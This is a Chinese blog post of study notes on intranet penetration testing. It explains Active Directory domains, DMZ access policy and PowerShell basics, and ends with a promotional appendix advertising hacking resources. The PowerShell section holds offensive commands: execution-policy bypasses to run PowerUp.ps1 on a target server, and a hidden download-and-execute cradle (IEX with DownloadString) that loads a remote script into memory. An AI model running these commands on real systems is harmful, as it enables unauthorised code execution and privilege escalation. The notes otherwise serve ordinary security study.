《内网安全攻防渗透测试实战指南》笔记之内网渗透测试基础,从零基础到精通,收藏这篇就够了!

《内网安全攻防渗透测试实战指南》学习笔记整理,快速掌握内网渗透的关键知识点:

一、内网基础知识

  • 域控制器(DC)

  • 出于管理及其他需求,需要在网络中划分多个域。第一个域称为

  • 域树

域树拓扑结构图

  • 域森林

(域森林拓扑图)

  • 域名服务器

  • 活动目录(AD)

安全域的划分:划分安全域的目的是将一组安全等级相同的计算机划入同一网段。这个网段的计算机有相同的网络边界,并在网络边界上通过部署防火墙来实现对其他安全域的网络访问控制策略,从而对允许哪些IP地址访问此域、允许此域访问哪些IP地址和网段进行设置。

(安全域)

DMZ称为隔离区,是为了解决安装防火墙后外部网络不能访问内部网络服务器的问题而设立的一个非安全系统与安全系统之间的缓冲区。DMZ位于企业内部网络和外部网络之间。可以在DMZ中放置一些必须公开的服务器设施。

访问控制策略:

  • 内网可以访问外网:在这一策略中,防火墙需要执行NAT

  • 内网可以访问DMZ

  • 外网不能访问内网

  • 外网可以访问DMZ

  • DMZ不能访问内网:如果不执行此策略,当攻击者攻陷DMZ时,内网将无法受到保护。

  • DMZ不能访问外网:此策略也有例外。例如,在DMZ中放置了邮件服务器,就要允许访问外网,否则邮件服务器无法正常工作。

域中计算机的分类:

  • 域控制器:可以有多台计算机被配置为域控制器

  • 成员服务器:域中安装了服务器操作系统且没有安装活动目录的计算机

  • 客户机:域中安装了其他操作系统的计算机

  • 独立服务器:即服务器不加入域,也不安装活动目录

域内权限解读:

组(group)是用户账号的集合。通过向一组用户分配权限,就可以不必向每个用户分别分配权限。

  • 域本地组:多域用户访问单域资源(访问同一个域),可以从任何域添加用户账号、通用组和全局组,但只能在其所在域内指派权限。域本地组不能嵌套在其他组中。

  • 全局组:单域用户访问多域资源(必须是同一个域中的用户),只能在创建该全局组的域中添加用户和全局组。可以在域森林的任何域中指派权限。全局组可以嵌套在其他组中。

  • 通用组:通用组的成员来自域森林中任何域的用户账号、全局组和其他通用组,可以在该域森林的任何域中指派权限,可以嵌套在其他组中,非常适合在域森林内的跨域访问中使用。

  • A-G-DL-P策略 是指将用户账号添加到全局组中,将全局组添加到域本地组中,然后为域本地组分配资源权限。

           A表示用户账号(Account)、G表示全局组(Global Group)、U表示通用组(Universal Group)、DL表示域本地组(Domain Local Group)、P表示资源权限(Permission)
    
           当A\-G\-DL\-P策略形成后,当需要给一个用户添加某个权限时,只要把这个用户添加到某个本地域组中就可以了。
    
    

二、PowerShell基础

PowerShell的基本概念

  • .ps1

  • 执行策略:为了防止使用者运行恶意脚本,PowerShell提供了一个执行策略。在默认情况下,这个执行策略被设置为“不能运行”。如果PowerShell脚本无法运行,可以使用下面的cmdlet命令查询当前的执行策略

       **Get\-ExecutionPolicy** : 1、Restricted 脚本不能运行(默认设置);2、RemoteSigned 在本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书签名的除外);3、AllSigned 仅当脚本由受信任的发布者签名时才能运行;4、**Unrestricted 允许所有脚本运行**
    
    

       可以使用下面的cmdlet命令设置PowerShell的执行策略

Set-ExecutionPolicy <policy name>  
Set-ExecutionPolicy Unrestricted

       **要想运行powershell脚本,必须使用管理员权限将策略从Restricted改成Unrestricted**

  • 运行脚本:要想运行一个PowerShell脚本,必须输入完整的路径和文件名,例如"C:\Scripts\a.ps1" 。如果PowerShell脚本文件刚好在系统目录中,在命令提示符后直接输入脚本文件名(例如".\a.ps1")即可运行脚本。

  • 管道:管道的作用是将一个命令的输出作为另一个命令的输入,两个命令之间用"|"连接。例如,执行如下命令,让所有正在运行的、名字以字符"p"开头的程序停止运行。

PS> get-process p\* | stop-process

PowerShell的常用命令

在powershell下,类似cmd命令的命令叫做cmdlet命令。二者的命名规范一致,都采用"动词-名词"的形式,例如"New-Item"。命令的别名一般兼容Windows Command和Linux Shell,例如Get-ChildItem命令在dir和ls下均可使用。另外,PowerShell命令不区分大小写

  • 绕过本地权限并执行。

       将powerup.ps1上传至目标服务器。在命令行环境下,执行如下命令,绕过安全策略,在目标服务器本地执行该脚本
    
    
PowerShell.exe -ExecutionPolicy Bypass -File PowerUp.ps1

     将同一个脚本上传到目标服务器中,在目标本地执行脚本文件,命令如下

powershell.exe -exec bypass -Command "& {Import-Module C:\\PowerUp.ps1; Invoke-AllChecks}" 

  • 从网站服务器中下载脚本,绕过本地权限并隐藏执行
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Noprofile -NonI IEX(New-Object Net.WebClient).DownloadString("xxx.ps1");\[Parameters\]

      \-ExecutionPolicy Bypass(\-Exec Bypass):绕过执行安全策略。

      \-WindowStyle Hidden (\-W Hidden): 隐藏窗口

      \-NonInteractive (\-NonI) :非交互模式

      \-NoProfile (\-NoP) : powershell控制台不加载当前用户的配置文件

      \-noexit : 执行后不退出shell。这个参数在使用键盘记录等脚本时非常重要

      \-NoLogo:启动不显示版权标志的Powershell

IEX (New-Object Net.WebClient).DownloadString('#{remote\_script}');  
该命令将#{remote\_script}加载到内存,并没有把该脚本下载到本地

  • 在64位的Windows操作系统中,存在两个版本的powershell,一个是x64版本的,另一个是x86版本的。这两个版本的执行策略不会互相影响,可以把它们看成两个独立的程序。x64版本powershell的配置文件在%windir%\syswow64\WindowsPowerShell\v1.0\目录下。

题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
侵权,请联系删除。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值